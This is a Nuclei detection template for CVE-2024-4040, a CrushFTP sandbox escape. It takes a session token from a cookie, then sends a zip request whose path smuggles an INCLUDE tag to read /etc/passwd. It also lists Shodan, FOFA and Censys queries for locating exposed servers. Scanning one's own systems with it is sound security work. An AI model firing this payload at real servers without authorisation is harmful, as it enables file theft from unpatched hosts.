cve-2024-4040-nuclei-template.yaml
id: CVE-2024-4040

info:
  name: CrushFTP VFS Sandbox Escape
  author: rahisec
  severity: high
  description: |
    A vulnerability in CrushFTP (all versions before 10.7.1 and 11.1.0) on all platforms allows remote attackers with low privileges to escape the VFS sandbox and access the filesystem outside of the designated sandbox. This can lead to unauthorized access to sensitive files.
  reference:
    - https://github.com/rix4uni/CVE-Exploits/blob/main/CVE-2024-4040.py
    - https://twitter.com/h4x0r_dz/status/1783263922453135391
    - https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
    - https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
    - https://www.crushftp.com/crush11wiki/Wiki.jsp?page=Update
    - https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
    - https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 7.7
    cve-id: CVE-2024-4040
    cwe-id: CWE-20
  metadata:
    google-query:
      - intitle:"CrushFTP WebInterface"
    shodan-query:
      - html:"CrushFTP"
      - http.favicon.hash:"-1022206565"
      - title:"CrushFTP WebInterface"
      - "Server: CrushFTP HTTP Server"
    censys-query:
      - services.http.response.favicons.md5_hash:"297a81069094d00a052733d3a0537d18"
      - services.http.response.html_title:"CrushFTP WebInterface"
    fofa-query:
      - icon_hash="-1022206565"
      - (title="CrushFTP WebInterface")
      - "Server: CrushFTP HTTP Server"
    hunter-query:
      - favicon_hash=="297a81069094d00a052733d3a0537d18"
    verified: true
    max-request: 2
  tags: cve,cve2024,lfi,crushftp,vfs,sandbox-escape

http:
  - raw:
      # Request 1: load the web interface so the server sets the currentAuth cookie.
      - |
        GET /WebInterface/ HTTP/1.1
        Host: {{Hostname}}
      # Request 2: reuse the extracted token as c2f in the zip command.
      - |
        POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=* HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:"

    extractors:
      - type: regex
        name: auth
        internal: true
        part: header
        # Capture only the token value; without group 1 the whole
        # "currentAuth=..." match would be substituted into c2f.
        group: 1
        regex:
          - 'currentAuth=([0-9a-zA-Z]+)'